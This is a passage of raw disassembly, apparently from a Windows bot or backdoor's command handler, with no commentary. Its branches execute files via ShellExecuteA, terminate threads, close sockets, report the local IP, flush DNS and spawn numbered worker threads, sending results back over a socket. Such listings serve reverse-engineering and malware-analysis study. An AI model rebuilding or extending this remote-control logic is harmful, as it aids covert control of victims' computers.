; sub_40FCA3+2116�j ...
push eax
call sub_41795B
pop ecx
pop ecx
jmp loc_412721
; ---------------------------------------------------------------------------
loc_414B54: ; CODE XREF: sub_40FCA3+1B79�j
; sub_40FCA3+1B90�j
push 7Fh
push edi
push [ebp+arg_14]
call sub_419300
push edi
lea eax, [ebp+var_2EC]
push 4380C0h
push eax
call sub_41795B
add esp, 18h
jmp loc_412AF4
; ---------------------------------------------------------------------------
loc_414B79: ; CODE XREF: sub_40FCA3+1B4B�j
; sub_40FCA3+1B62�j
push 5 ; nShowCmd
push ebx ; lpDirectory
push ebx ; lpParameters
push edi ; lpFile
push offset Operation ; lpOperation
push ebx ; hwnd
call ShellExecuteA ; ShellExecuteA
test eax, eax
push edi
lea eax, [ebp+var_2EC]
jz short loc_414B9F
push 438084h
jmp loc_412718
; ---------------------------------------------------------------------------
loc_414B9F: ; CODE XREF: sub_40FCA3+4EF0�j
push 438040h
jmp loc_412718
; ---------------------------------------------------------------------------
loc_414BA9: ; CODE XREF: sub_40FCA3+1B1D�j
; sub_40FCA3+1B34�j
mov al, [edi]
mov byte ptr unk_4315B8, al
movsx eax, byte ptr [edi]
push eax
push 438008h
loc_414BB9: ; CODE XREF: sub_40FCA3+1E5C�j
; sub_40FCA3+1E9F�j ...
lea eax, [ebp+var_2EC]
push eax
call sub_41795B
loc_414BC5: ; CODE XREF: sub_40FCA3+2F9C�j
add esp, 0Ch
jmp loc_412AF4
; ---------------------------------------------------------------------------
loc_414BCD: ; CODE XREF: sub_40FCA3+1AEF�j
; sub_40FCA3+1B06�j
push edi
call sub_417ECF
test eax, eax
pop ecx
jle loc_415F22
push edi
call sub_417ECF
cmp eax, 5DCh
pop ecx
jge loc_415F22
push ebx
push ebx
lea eax, [ebp+var_B4]
push 1
push eax
push [ebp+s]
call sub_41689B
push eax
lea eax, [ebp+var_2EC]
push 438AFCh
push eax
call sub_41795B
add esp, 20h
jmp loc_413EDF
; ---------------------------------------------------------------------------
loc_414C1B: ; CODE XREF: sub_40FCA3+1AC1�j
; sub_40FCA3+1AD8�j
push edi
call sub_417ECF
test eax, eax
pop ecx
jle loc_4100FB
push edi
call sub_417ECF
cmp eax, 5DCh
pop ecx
jge loc_4100FB
push 437FF8h ; int
push edi
call sub_417ECF
imul eax, 234h
pop ecx
push dword ptr [eax+44B874h] ; s
call sub_40E190
pop ecx
pop ecx
push 1F4h ; dwMilliseconds
call Sleep ; Sleep
push edi
call sub_417ECF
imul eax, 234h
pop ecx
push dword ptr [eax+44B874h] ; s
call closesocket_0
push [ebp+ThreadId] ; dwExitCode
push edi
call sub_417ECF
imul eax, 234h
pop ecx
push dword ptr [eax+44B87Ch] ; hThread
call TerminateThread ; TerminateThread
push edi
call sub_417ECF
imul eax, 234h
push edi
mov [eax+44B87Ch], ebx
call sub_417ECF
imul eax, 234h
pop ecx
pop ecx
mov [eax+44B668h], bl
jmp loc_4100FB
; ---------------------------------------------------------------------------
loc_414CC6: ; CODE XREF: sub_40FCA3+1A93�j
; sub_40FCA3+1AAA�j
push edi
push 437FF4h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_414D03
call sub_4175E2
cmp eax, ebx
jle short loc_414CEB
push eax
push 437FBCh
jmp loc_4127BE
; ---------------------------------------------------------------------------
loc_414CEB: ; CODE XREF: sub_40FCA3+503B�j
lea eax, [ebp+var_2EC]
push 437F84h
push eax
call sub_41795B
pop ecx
pop ecx
jmp loc_4127CD
; ---------------------------------------------------------------------------
loc_414D03: ; CODE XREF: sub_40FCA3+5032�j
mov eax, [ebp+var_BC]
lea esi, [eax+1]
jmp short loc_414D7A
; ---------------------------------------------------------------------------
loc_414D0E: ; CODE XREF: sub_40FCA3+50DA�j
mov edi, [ebp+esi*4+var_94]
cmp edi, ebx
jz loc_4100FB
push edi
call sub_417ECF
push eax
call sub_41755A
pop ecx
pop ecx
test eax, eax
push edi
lea eax, [ebp+var_2EC]
jz short loc_414D3D
push 437F50h
jmp short loc_414D42
; ---------------------------------------------------------------------------
loc_414D3D: ; CODE XREF: sub_40FCA3+5091�j
push 437F14h
loc_414D42: ; CODE XREF: sub_40FCA3+5098�j
push eax
call sub_41795B
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_414D6C
push ebx ; int
lea eax, [ebp+var_2EC]
push [ebp+var_4] ; int
push eax ; int
push [ebp+hFile] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_414D6C: ; CODE XREF: sub_40FCA3+50AB�j
lea eax, [ebp+var_2EC]
push eax
call sub_40CB08
pop ecx
inc esi
loc_414D7A: ; CODE XREF: sub_40FCA3+5069�j
cmp esi, 20h
jb short loc_414D0E
jmp loc_4100FB
; ---------------------------------------------------------------------------
loc_414D84: ; CODE XREF: sub_40FCA3+1A65�j
; sub_40FCA3+1A7C�j
cmp [ebp+var_C], ebx
jz loc_415F22
push edi
push [ebp+var_C]
call sub_417F60
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_415F22
push esi ; char
push 429108h ; int
push [ebp+s] ; s
call sub_40E190
push esi
push 437EECh
jmp short loc_414E02
; ---------------------------------------------------------------------------
loc_414DB8: ; CODE XREF: sub_40FCA3+1A37�j
; sub_40FCA3+1A4E�j
push edi ; char
push 438A2Ch ; int
push [ebp+s] ; s
call sub_40E190
push edi
push 437EBCh
jmp short loc_414E02
; ---------------------------------------------------------------------------
loc_414DCE: ; CODE XREF: sub_40FCA3+1A09�j
; sub_40FCA3+1A20�j
push [ebp+esi+hFile]
push edi ; char
push 43A988h ; int
push [ebp+s] ; s
call sub_40E190
push edi
push 437E8Ch
jmp loc_413F92
; ---------------------------------------------------------------------------
loc_414DEE: ; CODE XREF: sub_40FCA3+19DB�j
; sub_40FCA3+19F2�j
push edi ; char
push 43A968h ; int
push [ebp+s] ; s
call sub_40E190
push edi
push 437E58h
loc_414E02: ; CODE XREF: sub_40FCA3+4418�j
; sub_40FCA3+5113�j ...
call sub_40CB7C
loc_414E07: ; CODE XREF: sub_40FCA3+447E�j
add esp, 14h
jmp loc_415F22
; ---------------------------------------------------------------------------
loc_414E0F: ; CODE XREF: sub_40FCA3+199E�j
; sub_40FCA3+19B5�j
mov al, byte ptr unk_4315DA
mov [ebp+arg_24], ebx
cmp al, bl
mov edx, 4315DAh
jz loc_4100FB
mov ecx, edx
loc_414E26: ; CODE XREF: sub_40FCA3+518B�j
inc [ebp+arg_24]
add ecx, 0Bh
cmp [ecx], bl
jnz short loc_414E26
cmp al, bl
jz loc_4100FB
mov [ebp+addr], edx
loc_414E3B: ; CODE XREF: sub_40FCA3+5439�j
push 8
call sub_417661
pop ecx
mov ecx, eax
mov eax, 190h
cdq
idiv [ebp+arg_24]
add eax, ecx
cmp eax, 3E8h
jle short loc_414E88
push ecx
lea eax, [ebp+var_2EC]
push 4393B0h
push eax
call sub_41795B
push ebx ; int
lea eax, [ebp+var_2EC]
push [ebp+var_4] ; int
push eax ; int
push [ebp+hFile] ; int
push edi ; s
call sub_40E1D6
add esp, 20h
jmp loc_4150D3
; ---------------------------------------------------------------------------
loc_414E88: ; CODE XREF: sub_40FCA3+51B2�j
or [ebp+var_46C], 0FFFFFFFFh
cmp dword ptr unk_42B620, ebx
mov [ebp+var_470], 0FAh
mov [ebp+var_484], 5
mov [ebp+var_480], ebx
mov [ebp+arg_24], ebx
jz short loc_414EF5
mov esi, 42B620h
loc_414EB9: ; CODE XREF: sub_40FCA3+5234�j
mov eax, [ebp+addr]
add eax, 0FFFFFFF6h
push eax
lea eax, [esi-28h]
push eax
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz short loc_414EDB
inc [ebp+arg_24]
add esi, 40h
cmp [esi], ebx
jnz short loc_414EB9
jmp short loc_414EF5
; ---------------------------------------------------------------------------
loc_414EDB: ; CODE XREF: sub_40FCA3+522A�j
mov eax, [ebp+arg_24]
mov ecx, eax
mov [ebp+var_46C], eax
shl ecx, 6
mov ecx, [ecx+42B620h]
mov [ebp+var_488], ecx
loc_414EF5: ; CODE XREF: sub_40FCA3+520F�j
; sub_40FCA3+5236�j
cmp [ebp+var_488], ebx
jz loc_4150F9
push 10h
lea eax, [ebp+lpNewFileName]
pop esi
push eax ; namelen
lea eax, [ebp+name]
push eax ; name
push edi ; s
mov dword ptr [ebp+lpNewFileName], esi
call getsockname ; getsockname
mov al, [ebp+var_A5F]
push esi
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and dword ptr [ebp+name.sa_data+2], eax
push dword ptr [ebp+name.sa_data+2] ; in
call inet_ntoa_0
push eax
lea eax, [ebp+var_59C]
push eax
call sub_419300
xor eax, eax
cmp [ebp+var_A5F], bl
push 30h
setnz al
inc eax
inc eax
mov esi, eax
lea eax, [ebp+var_59C]
push eax
call sub_419570
add esp, 14h
cmp esi, ebx
mov byte ptr [ebp+s+3], bl
jle short loc_414F95
loc_414F73: ; CODE XREF: sub_40FCA3+52F0�j
cmp eax, ebx
jz short loc_414F95
mov byte ptr [eax], 78h
lea eax, [ebp+var_59C]
push 30h
push eax
call sub_419570
inc byte ptr [ebp+s+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+s+3]
cmp ecx, esi
jl short loc_414F73
loc_414F95: ; CODE XREF: sub_40FCA3+52CE�j
; sub_40FCA3+52D2�j
mov eax, [ebp+var_4]
push [ebp+hFile]
mov [ebp+var_464], eax
mov eax, [ebp+var_8]
mov [ebp+var_460], eax
lea eax, [ebp+var_58C]
push 80h
push eax
mov [ebp+var_45C], 1
mov [ebp+var_48C], edi
call sub_417EDA
mov esi, 431694h
push 440F9Ch
push esi
call sub_417D80
add esp, 14h
test eax, eax
jz short loc_414FFC
push esi
lea eax, [ebp+var_50C]
push 80h
push eax
call sub_417EDA
add esp, 0Ch
jmp short loc_415002
; ---------------------------------------------------------------------------
loc_414FFC: ; CODE XREF: sub_40FCA3+5340�j
mov [ebp+var_50C], bl
loc_415002: ; CODE XREF: sub_40FCA3+5357�j
cmp [ebp+var_45C], ebx
mov eax, 439314h
jnz short loc_415014
mov eax, 439308h
loc_415014: ; CODE XREF: sub_40FCA3+536A�j
push [ebp+var_470]
lea ecx, [ebp+var_59C]
push [ebp+var_480]
push [ebp+var_484]
push [ebp+var_488]
push ecx
push eax
lea eax, [ebp+var_2EC]
push 437DE0h
push eax
call sub_41795B
push ebx
lea eax, [ebp+var_2EC]
push 8
push eax
call sub_41741F
add esp, 2Ch
mov [ebp+var_47C], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+var_59C]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_4082D7 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_47C]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_4150EF
call GetLastError
push eax
lea eax, [ebp+var_2EC]
push 439250h
push eax
call sub_41795B
add esp, 0Ch
loc_4150A7: ; CODE XREF: sub_40FCA3+5454�j
cmp [ebp+var_8], ebx
jnz short loc_4150C6
push ebx ; int
lea eax, [ebp+var_2EC]
push [ebp+var_4] ; int
push eax ; int
push [ebp+hFile] ; int
push edi ; s
call sub_40E1D6
add esp, 14h
loc_4150C6: ; CODE XREF: sub_40FCA3+5407�j
lea eax, [ebp+var_2EC]
push eax
call sub_40CB08
pop ecx
loc_4150D3: ; CODE XREF: sub_40FCA3+51E0�j
add [ebp+addr], 0Bh
mov eax, [ebp+addr]
cmp [eax], bl
jnz loc_414E3B
jmp loc_4100FB
; ---------------------------------------------------------------------------
loc_4150E7: ; CODE XREF: sub_40FCA3+5452�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_4150EF: ; CODE XREF: sub_40FCA3+53E7�j
cmp [ebp+var_458], ebx
jz short loc_4150E7
jmp short loc_4150A7
; ---------------------------------------------------------------------------
loc_4150F9: ; CODE XREF: sub_40FCA3+5258�j
push 439368h
loc_4150FE: ; CODE XREF: sub_40FCA3+5522�j
lea eax, [ebp+var_2EC]
push eax
call sub_41795B
pop ecx
pop ecx
jmp loc_415E94
; ---------------------------------------------------------------------------
loc_415111: ; CODE XREF: sub_40FCA3+1970�j
; sub_40FCA3+1987�j
push [ebp+hFile]
lea eax, [ebp+var_A4]
push 80h
push eax
call sub_417EDA
mov eax, [ebp+var_4]
push 437DA4h
mov [ebp+var_20], eax
mov eax, [ebp+var_8]
mov [ebp+var_1C], eax
lea eax, [ebp+var_2EC]
push 200h
push eax
mov [ebp+var_A8], edi
call sub_417EDA
push ebx
lea eax, [ebp+var_2EC]
push 20h
push eax
call sub_41741F
add esp, 24h
mov [ebp+var_24], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+var_A8]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_409990 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_24]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_4151AA
call GetLastError
push eax
push 437D58h
jmp loc_413B05
; ---------------------------------------------------------------------------
loc_4151A2: ; CODE XREF: sub_40FCA3+550A�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_4151AA: ; CODE XREF: sub_40FCA3+54EC�j
cmp [ebp+var_18], ebx
jz short loc_4151A2
jmp loc_4105FA
; ---------------------------------------------------------------------------
loc_4151B4: ; CODE XREF: sub_40FCA3+18DC�j
; sub_40FCA3+18F3�j
push 4
call sub_417661
test eax, eax
pop ecx
jle short loc_4151CA
push 437D28h
jmp loc_4150FE
; ---------------------------------------------------------------------------
loc_4151CA: ; CODE XREF: sub_40FCA3+551B�j
mov eax, [ebp+esi+lpExistingFileName]
cmp eax, ebx
jz short loc_4151EC
push eax
lea eax, [ebp+var_15FC]
push 104h
push eax
call sub_417EDA
add esp, 0Ch
jmp short loc_4151FF
; ---------------------------------------------------------------------------
loc_4151EC: ; CODE XREF: sub_40FCA3+5530�j
lea eax, [ebp+var_15FC]
push 104h
push eax
push ebx
call dword ptr byte_424084+4
loc_4151FF: ; CODE XREF: sub_40FCA3+5547�j
mov esi, [ebp+esi+hFile]
cmp esi, ebx
jnz short loc_41520F
mov esi, 431644h
loc_41520F: ; CODE XREF: sub_40FCA3+5565�j
push esi
lea eax, [ebp+var_14F8]
push 104h
push eax
call sub_417EDA
mov eax, dword ptr unk_4315A4
push 7Fh
push [ebp+hFile]
mov [ebp+var_13EC], eax
lea eax, [ebp+var_13E8]
mov [ebp+var_13F0], ebx
push eax
mov [ebp+var_1600], edi
call sub_419300
mov eax, [ebp+var_4]
mov [ebp+var_1368], eax
mov eax, [ebp+var_8]
mov [ebp+var_1364], eax
lea eax, [ebp+var_14F8]
push eax
lea eax, [ebp+var_15FC]
push eax
lea eax, [ebp+var_2EC]
push [ebp+var_13EC]
push 42BBD8h
push eax
call sub_41795B
push ebx
lea eax, [ebp+var_2EC]
push 4
push eax
call sub_41741F
add esp, 38h
mov [ebp+var_13F4], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+var_1600]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_407516 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_13F4]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_4152E3
call GetLastError
push eax
push 437CE0h
jmp loc_415E85
; ---------------------------------------------------------------------------
loc_4152DB: ; CODE XREF: sub_40FCA3+5646�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_4152E3: ; CODE XREF: sub_40FCA3+5625�j
cmp [ebp+var_1360], ebx
jz short loc_4152DB
jmp loc_415E94
; ---------------------------------------------------------------------------
loc_4152F0: ; CODE XREF: sub_40FCA3+18AE�j
; sub_40FCA3+18C5�j
cmp [ebp+esi+lpExistingFileName], ebx
jz short loc_415319
push [ebp+esi+lpExistingFileName]
call sub_417ECF
test eax, eax
pop ecx
jz short loc_415319
push [ebp+esi+lpExistingFileName]
call sub_417ECF
pop ecx
jmp short loc_41531E
; ---------------------------------------------------------------------------
loc_415319: ; CODE XREF: sub_40FCA3+5654�j
; sub_40FCA3+5665�j
mov eax, dword ptr unk_4315A8
loc_41531E: ; CODE XREF: sub_40FCA3+5674�j
mov esi, [ebp+esi+hFile]
mov [ebp+var_C90], eax
xor eax, eax
cmp [ebp+var_A5C], bl
setz al
cmp esi, ebx
mov [ebp+var_C7C], eax
jz short loc_415351
lea eax, [ebp+var_D94]
push esi
push eax
call sub_41795B
pop ecx
pop ecx
jmp short loc_41537C
; ---------------------------------------------------------------------------
loc_415351: ; CODE XREF: sub_40FCA3+569B�j
lea eax, [ebp+Buffer]
push 104h ; uSize
push eax ; lpBuffer
call GetSystemDirectoryA ; GetSystemDirectoryA
push ebx
push ebx
lea eax, [ebp+name.sa_data+2]
push ebx
push eax
lea eax, [ebp+Buffer]
push eax
call sub_419B08
add esp, 14h
loc_41537C: ; CODE XREF: sub_40FCA3+56AC�j
lea eax, [ebp+var_D94]
push eax
call sub_4180D0
cmp [ebp+eax+var_D95], 5Ch
pop ecx
jnz short loc_4153A7
lea eax, [ebp+var_D94]
push eax
call sub_4180D0
pop ecx
mov [ebp+eax+var_D95], bl
loc_4153A7: ; CODE XREF: sub_40FCA3+56EE�j
push [ebp+hFile]
lea eax, [ebp+var_101C]
mov [ebp+var_1020], edi
push 80h
push eax
call sub_417EDA
mov eax, [ebp+var_8]
mov esi, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_C80], eax
lea eax, [ebp+var_D94]
mov [ebp+var_C84], esi
push eax
push [ebp+var_C90]
push edi ; s
call sub_40B972
pop ecx
push eax
lea eax, [ebp+var_2EC]
push 42BAB8h
push eax
call sub_41795B
push ebx
lea eax, [ebp+var_2EC]
push 3
push eax
call sub_41741F
add esp, 20h
mov [ebp+var_C88], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+var_1020]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_406428 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_C88]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_415479
call GetLastError
push eax
lea eax, [ebp+var_2EC]
push 437C98h
push eax
call sub_41795B
add esp, 0Ch
loc_415461: ; CODE XREF: sub_40FCA3+57DE�j
cmp [ebp+var_8], ebx
jnz loc_4105FA
push ebx
push esi
jmp loc_415EA1
; ---------------------------------------------------------------------------
loc_415471: ; CODE XREF: sub_40FCA3+57DC�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_415479: ; CODE XREF: sub_40FCA3+57A1�j
cmp [ebp+var_C74], ebx
jz short loc_415471
jmp short loc_415461
; ---------------------------------------------------------------------------
loc_415483: ; CODE XREF: sub_40FCA3+1880�j
; sub_40FCA3+1897�j
mov esi, [ebp+esi+lpExistingFileName]
cmp esi, ebx
jz short loc_415496
push esi
call sub_417ECF
jmp short loc_41549D
; ---------------------------------------------------------------------------
loc_415496: ; CODE XREF: sub_40FCA3+57E9�j
push 8
call sub_417680
loc_41549D: ; CODE XREF: sub_40FCA3+57F1�j
cmp eax, ebx
pop ecx
jz loc_415F22
push eax ; int
push [ebp+var_4] ; int
push [ebp+hFile] ; int
push edi ; s
call sub_407AD1
jmp loc_415962
; ---------------------------------------------------------------------------
loc_4154BB: ; CODE XREF: sub_40FCA3+1852�j
; sub_40FCA3+1869�j
mov eax, DnsFlushResolverCache
cmp eax, ebx
jz short loc_4154DE
call eax ; DnsFlushResolverCache
test eax, eax
lea eax, [ebp+var_2EC]
jz short loc_4154D7
push 437C64h
jmp short loc_4154FF
; ---------------------------------------------------------------------------
loc_4154D7: ; CODE XREF: sub_40FCA3+582B�j
push 437C28h
jmp short loc_4154FF
; ---------------------------------------------------------------------------
loc_4154DE: ; CODE XREF: sub_40FCA3+581F�j
push 437BECh
lea eax, [ebp+var_2EC]
jmp short loc_4154FF
; ---------------------------------------------------------------------------
loc_4154EB: ; CODE XREF: sub_40FCA3+1824�j
; sub_40FCA3+183B�j
call sub_40B89A
test eax, eax
lea eax, [ebp+var_2EC]
jz short loc_41550F
push 437BB8h
loc_4154FF: ; CODE XREF: sub_40FCA3+5832�j
; sub_40FCA3+5839�j ...
push 200h
push eax
call sub_417EDA
jmp loc_415DCF
; ---------------------------------------------------------------------------
loc_41550F: ; CODE XREF: sub_40FCA3+5855�j
push 437B7Ch
jmp short loc_4154FF
; ---------------------------------------------------------------------------
loc_415516: ; CODE XREF: sub_40FCA3+17F6�j
; sub_40FCA3+180D�j
cmp [ebp+var_8], ebx
jnz short loc_415533
push ebx ; int
push [ebp+var_4] ; int
push 437B68h ; int
push [ebp+hFile] ; int
push edi ; s
call sub_40E1D6
add esp, 14h
loc_415533: ; CODE XREF: sub_40FCA3+5876�j
push ebx ; int
push [ebp+var_4] ; int
call sub_40B401
push eax ; int
push [ebp+hFile] ; int
push edi ; s
call sub_40E1D6
push 437B3Ch
jmp loc_415836
; ---------------------------------------------------------------------------
loc_415553: ; CODE XREF: sub_40FCA3+170F�j
; sub_40FCA3+1726�j
push 7
call sub_417661
test eax, eax
pop ecx
jle short loc_415566
push 437B04h
jmp short loc_415585
; ---------------------------------------------------------------------------
loc_415566: ; CODE XREF: sub_40FCA3+58BA�j
push [ebp+hFile]
push edi
call sub_40C069
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_415580
push 437ACCh
jmp short loc_415585
; ---------------------------------------------------------------------------
loc_415580: ; CODE XREF: sub_40FCA3+58D4�j
push 437A9Ch
loc_415585: ; CODE XREF: sub_40FCA3+58C1�j
; sub_40FCA3+58DB�j
lea eax, [ebp+var_2EC]
push eax
call sub_41795B
cmp [ebp+var_8], ebx
pop ecx
pop ecx
jnz loc_4127EE
push ebx
lea eax, [ebp+var_2EC]
push [ebp+var_4]
push eax
push [ebp+hFile]
push edi
jmp loc_4127E6
; ---------------------------------------------------------------------------
loc_4155B3: ; CODE XREF: sub_40FCA3+16E1�j
; sub_40FCA3+16F8�j
push [ebp+var_8] ; int
push [ebp+var_4] ; int
push [ebp+hFile] ; int
push edi ; s
call sub_40ADF9
jmp loc_415855
; ---------------------------------------------------------------------------
loc_4155CA: ; CODE XREF: sub_40FCA3+16B3�j
; sub_40FCA3+16CA�j
push [ebp+esi+lpExistingFileName] ; lpDirectoryName
push [ebp+var_4] ; int
push [ebp+hFile] ; int
push edi ; s
call sub_40DE7F
jmp loc_415855
; ---------------------------------------------------------------------------
loc_4155E5: ; CODE XREF: sub_40FCA3+1685�j
; sub_40FCA3+169C�j
or [ebp+s], 0FFFFFFFFh
call GetTickCount ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov esi, [ebp+esi+lpExistingFileName]
cmp esi, ebx
mov [ebp+addr], eax
jz short loc_415610
push esi
call sub_417ECF
pop ecx
mov [ebp+s], eax
loc_415610: ; CODE XREF: sub_40FCA3+5961�j
mov eax, [ebp+addr]
xor edx, edx
mov ecx, 15180h
div ecx
cmp eax, [ebp+s]
jnb short loc_41562B
cmp [ebp+s], 0FFFFFFFFh
jnz loc_415F22
loc_41562B: ; CODE XREF: sub_40FCA3+597C�j
push ebx
call sub_40C21E
push eax
lea eax, [ebp+var_2EC]
push 437A74h
push eax
call sub_41795B
push ebx ; int
lea eax, [ebp+var_2EC]
push [ebp+var_4] ; int
push eax ; int
push [ebp+hFile] ; int
push edi ; s
call sub_40E1D6
lea eax, [ebp+var_2EC]
push eax
call sub_40CB08
jmp loc_415F1F
; ---------------------------------------------------------------------------
loc_41566B: ; CODE XREF: sub_40FCA3+1657�j
; sub_40FCA3+166E�j
push [ebp+var_4] ; int
push [ebp+hFile] ; int
push edi ; s
call sub_409577
lea eax, [ebp+var_2EC]
push 437A44h
push eax
call sub_41795B
add esp, 14h
jmp loc_415E94
; ---------------------------------------------------------------------------
loc_415693: ; CODE XREF: sub_40FCA3+1629�j
; sub_40FCA3+1640�j
push 21h
call sub_417661
test eax, eax
pop ecx
jle short loc_4156C5
cmp [ebp+var_8], ebx
jnz loc_4100FB
push ebx ; int
push [ebp+var_4] ; int
push 437A10h ; int
push [ebp+hFile] ; int
push edi ; s
loc_4156B8: ; CODE XREF: sub_40FCA3+8DF�j
call sub_40E1D6
add esp, 14h
jmp loc_4100FB
; ---------------------------------------------------------------------------
loc_4156C5: ; CODE XREF: sub_40FCA3+59FA�j
push [ebp+hFile]
lea eax, [ebp+var_754]
push 80h
push eax
call sub_417EDA
mov eax, [ebp+var_4]
mov esi, [ebp+esi+lpExistingFileName]
mov [ebp+var_6CC], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_758], edi
mov [ebp+var_6C8], eax
mov [ebp+var_6D0], ebx
jz short loc_415723
push esi
push 437A08h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_415723
mov [ebp+var_6D0], 1
loc_415723: ; CODE XREF: sub_40FCA3+5A63�j
; sub_40FCA3+5A74�j
lea eax, [ebp+var_2EC]
push 4379D8h
push eax
call sub_41795B
push ebx
lea eax, [ebp+var_2EC]
push 21h
push eax
call sub_41741F
add esp, 14h
mov [ebp+var_6D4], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+var_758]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_416380 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_6D4]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_4157A3
call GetLastError
push eax
lea eax, [ebp+var_2EC]
push 437988h
push eax
call sub_41795B
add esp, 0Ch
jmp loc_4127EE
; ---------------------------------------------------------------------------
loc_41579B: ; CODE XREF: sub_40FCA3+5B06�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_4157A3: ; CODE XREF: sub_40FCA3+5AD6�j
cmp [ebp+var_6C4], ebx
jz short loc_41579B
jmp loc_4127EE
; ---------------------------------------------------------------------------
loc_4157B0: ; CODE XREF: sub_40FCA3+15FB�j
; sub_40FCA3+1612�j
cmp [ebp+var_8], ebx
jnz short loc_4157CD
push ebx ; int
push [ebp+var_4] ; int
push 437960h ; int
push [ebp+hFile] ; int
push edi ; s
call sub_40E1D6
add esp, 14h
loc_4157CD: ; CODE XREF: sub_40FCA3+5B10�j
push edi ; s
call closesocket_0
call WSACleanup_0
call sub_40B584
push ebx
call dword ptr byte_424150
loc_4157E6: ; CODE XREF: sub_40FCA3+15CD�j
; sub_40FCA3+15E4�j
push ebx ; int
lea eax, [ebp+var_2EC]
push [ebp+var_4] ; int
push edi ; s
push eax ; int
call sub_40C3BE
pop ecx
pop ecx
push eax ; int
push [ebp+hFile] ; int
push edi ; s
call sub_40E1D6
push 437938h
jmp short loc_415836
; ---------------------------------------------------------------------------
loc_41580D: ; CODE XREF: sub_40FCA3+148C�j
; sub_40FCA3+14A3�j
push ebx ; int
lea eax, [ebp+var_2EC]
push [ebp+var_4] ; int
push edi ; s
push [ebp+arg_1C] ; int
push eax ; int
call sub_40C672
add esp, 0Ch
push eax ; int
push [ebp+hFile] ; int
push edi ; s
call sub_40E1D6
push 437910h
loc_415836: ; CODE XREF: sub_40FCA3+58AB�j
; sub_40FCA3+5B68�j
call sub_40CB08
loc_41583B: ; CODE XREF: sub_40FCA3+42F4�j
add esp, 18h
jmp loc_415F22
; ---------------------------------------------------------------------------
loc_415843: ; CODE XREF: sub_40FCA3+145E�j
; sub_40FCA3+1475�j
push [ebp+var_8] ; int
push [ebp+var_4] ; int
push [ebp+hFile] ; int
push edi ; s
call sub_40CBA8
loc_415855: ; CODE XREF: sub_40FCA3+3AC�j
; sub_40FCA3+5922�j ...
add esp, 10h
jmp loc_4100FB
; ---------------------------------------------------------------------------
loc_41585D: ; CODE XREF: sub_40FCA3+1430�j
; sub_40FCA3+1447�j
cmp [ebp+var_C], ebx
mov [ebp+var_B50], bl
jz short loc_41589C
mov esi, [ebp+esi+lpExistingFileName]
cmp esi, ebx
jz short loc_41589C
push esi
push [ebp+var_C]
call sub_417F60
pop ecx
cmp eax, ebx
pop ecx
jz short loc_41589C
push eax
push 42744Ch
lea eax, [ebp+var_B50]
push 80h
push eax
call sub_417EDA
add esp, 10h
loc_41589C: ; CODE XREF: sub_40FCA3+5BC3�j
; sub_40FCA3+5BCE�j ...
push [ebp+hFile]
lea eax, [ebp+var_BD0]
push 80h
push eax
call sub_417EDA
mov eax, [ebp+var_4]
push 4378E8h
mov [ebp+var_ACC], eax
mov eax, [ebp+var_8]
mov [ebp+var_AC8], eax
lea eax, [ebp+var_2EC]
push eax
mov [ebp+var_BD4], edi
call sub_41795B
push ebx
lea eax, [ebp+var_2EC]
push 1Fh
push eax
call sub_41741F
add esp, 20h
mov [ebp+var_AD0], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+var_BD4]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_40CBE8 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_AD0]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_41593C
call GetLastError
push eax
push 4378A0h
jmp loc_41609D
; ---------------------------------------------------------------------------
loc_415934: ; CODE XREF: sub_40FCA3+5C9F�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
